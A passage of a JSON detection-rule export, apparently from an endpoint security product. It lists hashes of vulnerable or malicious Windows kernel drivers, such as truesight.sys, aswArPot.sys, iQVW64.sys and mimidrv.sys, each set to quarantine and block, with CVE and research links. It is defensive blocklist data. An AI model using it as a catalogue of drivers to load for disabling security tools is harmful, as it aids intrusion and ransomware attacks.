+ "value": "48c7215dacce2bed9465430c8bf805418e02a4da4435014ffdc75d4a5c07a496",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58c85a4e-9092-53fd-949a-f88bc337233c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969186Z",
+ "creation_date": "2026-03-23T11:45:29.969188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ad0ab23023bc500c3b46f414a8b363c5f8700861bc4745cecc14dd34bcee9ed",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58ceb588-18c5-5b69-9dce-dcc370ac1c79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818056Z",
+ "creation_date": "2026-03-23T11:45:31.818059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e84f600c3ef63442368ea7dc9df85168c04d573ea765153a9cbf18e41dfc20f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58de1f8a-8e66-54d8-a340-7d04fa47cb24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604428Z",
+ "creation_date": "2026-03-23T11:45:29.604430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "425406152227f499013a6c3fbcf7700d98351a30e7813a30f0003f48eceb08ec",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58f31ee9-16a9-58e1-b2db-0365085fd091",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822131Z",
+ "creation_date": "2026-03-23T11:45:30.822133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87279855c17e3924ebfa07f51c1312d0e107f990f4ae174807ac4814da6179ac",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "58fa725a-515e-58a5-a344-d8d9dfa82b9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984209Z",
+ "creation_date": "2026-03-23T11:45:29.984211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9",
+ "comment": "Vulnerable Kernel Driver (aka AsrOmgDrv.sys) [https://www.loldrivers.io/drivers/3f39af20-802a-4909-a5de-7f6fe7aab350/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59071458-e0c8-54b9-b018-7f25f9004667",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606488Z",
+ "creation_date": "2026-03-23T11:45:29.606490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57ecd1bb823cb213dc801950a3495d14359694e52cadbad51e78f0acaae2b98a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "590a02c0-510a-5e5e-ab1d-c56790e4452f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979359Z",
+ "creation_date": "2026-03-23T11:45:29.979361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32882949ea084434a376451ff8364243a50485a3b4af2f2240bb5f20c164543d",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5911a81c-9aef-5b11-91e7-c7409719e707",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832407Z",
+ "creation_date": "2026-03-23T11:45:30.832409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832414Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16192d98b68513c3d62c313feb5eeace472439dea92fd0aca326f162eeffae5a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "591b5214-159e-5624-8cdc-aded219f4db8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972090Z",
+ "creation_date": "2026-03-23T11:45:29.972092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cff9aa9046bdfd781d34f607d901a431a51bb7e5f48f4f681cc743b2cdedc98c",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5920aa1b-4245-55af-8d34-a88972d9c090",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816962Z",
+ "creation_date": "2026-03-23T11:45:30.816964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c03433ea3376f6f099ad77a4ce59187817d1bc0c3c0f55fd931320d909dd920",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "592228c1-9408-5faa-9fd2-a8fa4cfc129f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974034Z",
+ "creation_date": "2026-03-23T11:45:29.974036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3eff841ea0f2786e5e0fed2744c0829719ad711fc9258eeaf81ed65a52a8918",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5933d707-bd6c-55b4-9959-a9f7ae2bf77f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159792Z",
+ "creation_date": "2026-03-23T11:45:31.159794Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05814beffff44b7713387f5595ba2f9a749e81d693a90e3c4e2af5f78cf049d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5946badf-e989-571f-b024-7eb249a810c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471047Z",
+ "creation_date": "2026-03-23T11:45:30.471051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3327d9e938d4ae29de110e219662ce04932935a7886e99feb508ffe77c9e00c2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "594740a1-1bcd-5246-8840-5e6d28a1c045",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484902Z",
+ "creation_date": "2026-03-23T11:45:31.484905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf652a6b20838d070f818f75a052a8194243cd0d25b047250905d6f8699f2c9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59557248-f290-5621-bfeb-c548b67fe336",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821771Z",
+ "creation_date": "2026-03-23T11:45:31.821774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821783Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d2edb6e885dbbce00b2d8ce9cbfd41eebd8f31c791ca6399a85d72b7acf09a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "595d949a-9edc-5c72-afa4-d8feaf6a0018",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968775Z",
+ "creation_date": "2026-03-23T11:45:29.968777Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968782Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fba53fa5825b568ce775e78bf2325f5444d2cad9ca96cb1b949de201c5186faf",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59684753-7d7d-5170-944b-c2e3b6c906fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829954Z",
+ "creation_date": "2026-03-23T11:45:31.829958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7626db66e81a226e9d8093e02bd762c8bd06197f26fd500430231fb0d992708",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "596d22ed-6126-54f4-8101-93f3d7e60dcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150841Z",
+ "creation_date": "2026-03-23T11:45:31.150843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4d4b10032367ccfb43fd3a31c7fe20b21a0e858071a9e287afcb6530a6e85af",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "596fac43-c0f6-55a3-a44b-91dae0c09bb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145503Z",
+ "creation_date": "2026-03-23T11:45:31.145505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab7b7cc9a42eed6c9e35eab55a8b9d49afabce8018f921f51506b16e52c56648",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "597bac2f-afcc-5ec3-81d9-fff27a6a4919",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147131Z",
+ "creation_date": "2026-03-23T11:45:32.147134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47ec51b5f0ede1e70bd66f3f0152f9eb536d534565dbb7fcc3a05f542dbe4428",
+ "comment": "Vulnerable Kernel Driver (aka BdApiUtil64.sys) [https://blog.talosintelligence.com/byovd-loader-deadlock-ransomware/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5983dee3-180d-5e4b-88f9-150acc679834",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146600Z",
+ "creation_date": "2026-03-23T11:45:31.146602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c71c2d36e4ec7e5a99dfa343cd02da07c21ac95fe013f16ab12e653d5bc29d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5998d8fd-a0e1-57e3-953e-8a17f7a4dc58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495337Z",
+ "creation_date": "2026-03-23T11:45:31.495340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495349Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20f199fb2ab7e0fab4b6acf42758eef858e92fb9bdb393ef27b2cdac4e2c7cd9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "59a15016-df38-5aa3-ac03-b50fe2847693",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
